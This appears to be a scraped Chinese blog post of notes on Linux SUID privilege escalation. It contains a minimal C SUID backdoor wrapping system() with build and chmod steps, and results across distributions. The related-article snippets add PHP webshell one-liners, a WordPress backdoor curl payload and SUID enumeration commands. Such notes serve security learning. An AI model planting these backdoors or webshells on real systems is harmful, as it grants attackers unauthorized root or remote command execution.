linux suid提权原理,linux关于suid提权笔记

最新推荐文章于 2023-02-08 13:08:36 发布
最新推荐文章于 2023-02-08 13:08:36 发布
阅读量252 收藏
点赞数
文章标签: linux suid提权原理

suid全称是Set owner User ID up on execution。这是Linux给可执行文件的一个属性,上述情况下,普通用户之所以也可以使用ping命令,原因就在我们给ping这个可执行文件设置了suid权限。

设置了s位的程序在运行时,其Effective UID将会设置为这个程序的所有者。比如,/bin/ping这个程序的所有者是0(root),它设置了s位,那么普通用户在运行ping时其Effective UID就是0,等同于拥有了root权限。

这里引入了一个新的概念Effective UID。Linux进程在运行时有三个UID:

Real UID 执行该进程的用户实际的UID

Effective UID 程序实际操作时生效的UID(比如写入文件时,系统会检查这个UID是否有权限)

Saved UID 在高权限用户降权后,保留的其原本UID(本文中不对这个UID进行深入探讨)

初代版本 suid.c

int main(int argc, char* argv[]) {

return system(argv[1]);

}

赋予 suid 权限

gcc suid.c -o suid

chmod +s suid

你以为这样就可以正常的利用好suid 后门了嘛???    不不不不 开始猜坑

其实也就是一个-p的问题

默认这样操作,也是有些系统可以正常获取suid 的

大佬帮测试的结果,保存一下

Linux发行版输出结果

Ubuntu 14.04

uid=33(www-data) gid=33(www-data) euid=0(root) egid=0(root) groups=0(root),33(www-data)

Ubuntu 16.04

uid=33(www-data) gid=33(www-data) groups=33(www-data)

Ubuntu 18.04

uid=33(www-data) gid=33(www-data) groups=33(www-data)

CentOS 6

uid=33(www-data) gid=33(www-data) groups=33(www-data)

CentOS 8

uid=33(www-data) gid=33(www-data) groups=33(www-data)

Debian 6

uid=33(www-data) gid=33(www-data) euid=0(root) egid=0(root) groups=0(root),33(www-data)

Debian 8

uid=33(www-data) gid=33(www-data) euid=0(root) egid=0(root) groups=0(root),33(www-data)

Kali 2019

uid=33(www-data) gid=33(www-data) groups=33(www-data)

有些系统是root权限,有些系统仍然是原本用户权限。

为什么会这样呢?

因为system 函数调用的形式 为  /bin/bash -c

之前遇到老的  nmap --interactive //(+S)执行成功并没有获取到suid 的权限,

黑是真谛
关注
Linux提权方法和工具总结
SHELLCODE_8BIT的博客
10-24 788
主动提权和被动提权1.SUID2.内核漏洞2.3 修改/etc/passwd3.定时任务提权4.sudo滥用提权5.nfs提权6.错误配置7.8.
利用tmp目录权限、suid 权限和C语言使普通帐号提权为ROOT权限
Fengg--Focus Oracle
06-29 7387
提权:利用tmp目录权限、suid 权限和C语言使普通帐号提权为ROOT权限 RHEL5-RHEL6下面都可以实现,root的UID是零 创建一个普通用户 useradd andy 切换到andy用户 su - andy 查看当前用户是谁 whoami 查看tmp目录权限 [andy@bogon tmp]$ ll -d /tmp drwx
LinuxSUID提权方法
内心不种满鲜花就会长满杂草
10-29 4059
SUID可以让调用者以文件拥有者的身份运行该文件,所以我们利用SUID提权的思路就是运行root用户所拥有的SUID的文件,那么我们运行该文件的时候就得获得root用户的身份了。 已知的可用来提权linux可行性的文件列表如下: nmap vim find bash more less nano cp 如下,新建一个2.txt的文件。我们查看权限为 -rw-r--r--。接下来我们加上suid权限,即让执行该命令的用户以命令拥有
LinuxSUID提权
Zlirving_的博客
08-25 848
0x00 SUID是什么? SUID其实和文件或目录的基本属性一样(r w x) ,当一个可执du行的文件(命令)拥有SUID时,x就变成s了,你试下:ll /usr/bin/passwd 就知道,意思就是当你执行这个命令时暂时拥有passwd的拥有者的权限,也就是root   0x01 suid提权 运行某些程序时暂时获得root的权限,例如ping(socket需要root才能运行) 搜索符合条件的可以用来提权的:(三种都可以) find / -perm -u=s -type f 2>/
Linux----SUID提权复现
qq_37451250的博客
12-03 1218
使用useradd命令,创建一个普通用户demo useradd -m demo == useradd 的-m选项是在/home目录下创建demo用户的家目录。 == 确认用户是否创建成功 cat /etc/passwd 在/etc/passwd文件末尾的第一个字段出现用户名demo,则创建用户成功。 ...
CVE-2022-1609 WordPress Weblizar Backdoor
PolarPeak的博客
05-30 644
$curl-s-d'blowfish=1'-d"blowf=system('id');"'http://localhost:8888/wp-json/am-member/license' uid=33(www-data)gid=33(www-data)groups=33(www-data)
Linux提权
qq_46258964的博客
01-07 1万+
Linux提权 Linux提权一般把提权脚本放置在/tmp目录下,临时文化,可读写执行。 有本地用户就本地提权,没有就msf提权Linux提权自动化脚本利用工具 信息收集工具:LinEnum, linuxprivchecker 漏洞收集工具:linux-exploit-suggester linux-exploit-suggester2 提权方式如下 1,Linux SUID提权 suid可以让调用者以文件拥有者的身份运行该文件, 所以我们就利用suid提权的思路就是运行root用户所拥有的suid文件
linux提权思路
weixin_68210863的博客
11-01 864
分享九种linux提权思路
linux命令练习笔记
03-17
这篇“Linux命令练习笔记”涵盖了几个关键的磁盘管理和文件系统相关的命令,包括fdisk、mkfs、mount以及/etc/fstab配置文件的使用。 1. **fdisk**:这是一个用于分区管理的命令。在fdisk中,`P`用于打印当前磁盘的...
linux-shell学习笔记.pdf
最新发布
05-08
### Linux Shell 学习笔记知识点概述 #### 一、Linux Shell 概述 - **定义**:Shell 是 Linux 操作系统的重要组成部分,是用户与操作系统交互的接口。 - **功能**: - 解释命令:将用户的命令转换为操作系统可以...
【Tryhackme】Startup(wireshark数据报分析,cron任务提权
二狗的博客
12-20 186
本文渗透的主机经过合法授权。本文使用的工具和方法仅限学习交流使用,请不要将文中使用的工具和渗透思路用于任何非法用途,对此产生的一切后果,本人不承担任何责任,也不对造成的任何误用或损害负责。
Ubuntu 16.04.2提权
热门推荐
March
01-29 1万+
系统版本为Ubuntu14.04.5 cat /etc/issue Ubuntu 14.04.5 LTS 查看当前权限 id uid=33(www-data) gid=33(www-data) groups=33(www-data) 网上搜一下有没有exp,然后找到一位博主,下载链接为:https://cyseclabs.com/exploits/upstream44.c 因为用户权限过低,无法在...
ubuntu里配置nginx访问flask+uwsgi请求链接返回502:connect() to unix:/home/ubuntu/myproject/myproject.sock failed
qq_27582541的博客
08-11 589
ubuntu里配置nginx访问uwsgi报错connect() to unix:/home/ubuntu/myproject/myproject.sock failed (13: Permission denied) while connecting to upstream,。。。,我一定要记录下 报错内容为: connect() to unix:/home/ubuntu/myproject/myproject.sock failed (13: Permission denied) while conne
【内网安全】——Linux提权姿势
Demo不是emo的博客
02-08 5831
Linux提权姿势汇总
深度分析linux提权SUID提权|Find提权|NMAP提权|VIM提权...
qq_60115503的博客
05-07 2911
SUID是Set User ID,SGID是Set Group的意思 SUID是一种特殊权限,设置了suid的程序文件,在用户执行该程序时,用户的权限是该程序文件属主的权限,例如程序文件的属主是root,那么执行该程序的用户就将暂时获得root账户的权限,SGID与SUID相似,只是执行程序时获得的是文件属组的权限
【安全牛学习笔记】WEBSHELL
weixin_34290096的博客
09-30 488
WEBSHELL <?php echo shell exec($_GET['cmd']);?> 中国菜刀: http://www.maicaidao.co/ <?php @eval($_POST['chopper']);?> 可能被ID...
linux 普通用户提权root
vippomelo的博客
09-28 1045
Linux提权SUID提权 本篇文章非原创,用作笔记方便后期查询,原创作者微信公众号“黑白之道”如有侵权,联系删除 什么是suid? 通俗的理解为其他用户执行这个程序的时候可以用该程序所有者/组的权限。 常见的可用于suid提权的命令 Vim find Bash More Less cp chmod ash/linux shell awk mv man python perl tcpdump 查找suid文件 1 2 ...
靶机渗透练习81-Momentum:2
hirak0的博客
04-24 1136
靶机描述 靶机地址:https://www.vulnhub.com/entry/momentum-2,702/ Description Difficulty : medium Keywords : curl, bash, code review This works better with VirtualBox rather than VMware 一、搭建靶机环境 攻击机Kali: IP地址:192.168.9.7 靶机: IP地址:192.168.9.79 注:靶机与Kali的IP地址只
Metaspliot进行漏洞扫描
weixin_30895603的博客
01-23 1273
Metaspliot进行漏洞扫描 Metasploit框架是Metasploit项目中最著名的创作,是一个软件开发、测试和利用漏洞的平台。它可以用来创建安全测试工具开发的模块,也可利用模块作为一个渗透测试系统。最初是由HD Moore在2003年创建作为一种便携式网络工具包。它是所有的安全研究人员和黑客之间最受欢迎的渗透测试工具之一。除了渗透测试,该工具还能够在网络和Web应用程序中...
linux suid提权
03-16
这种特性可以被滥用来进行提权攻击,即攻击者通过执行一个SUID文件来获取root权限。在Linux系统中,SUID文件通常是一些系统工具,如passwd、ping等。攻击者可以通过利用这些工具的漏洞来获取root权限。为了防止SUID...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值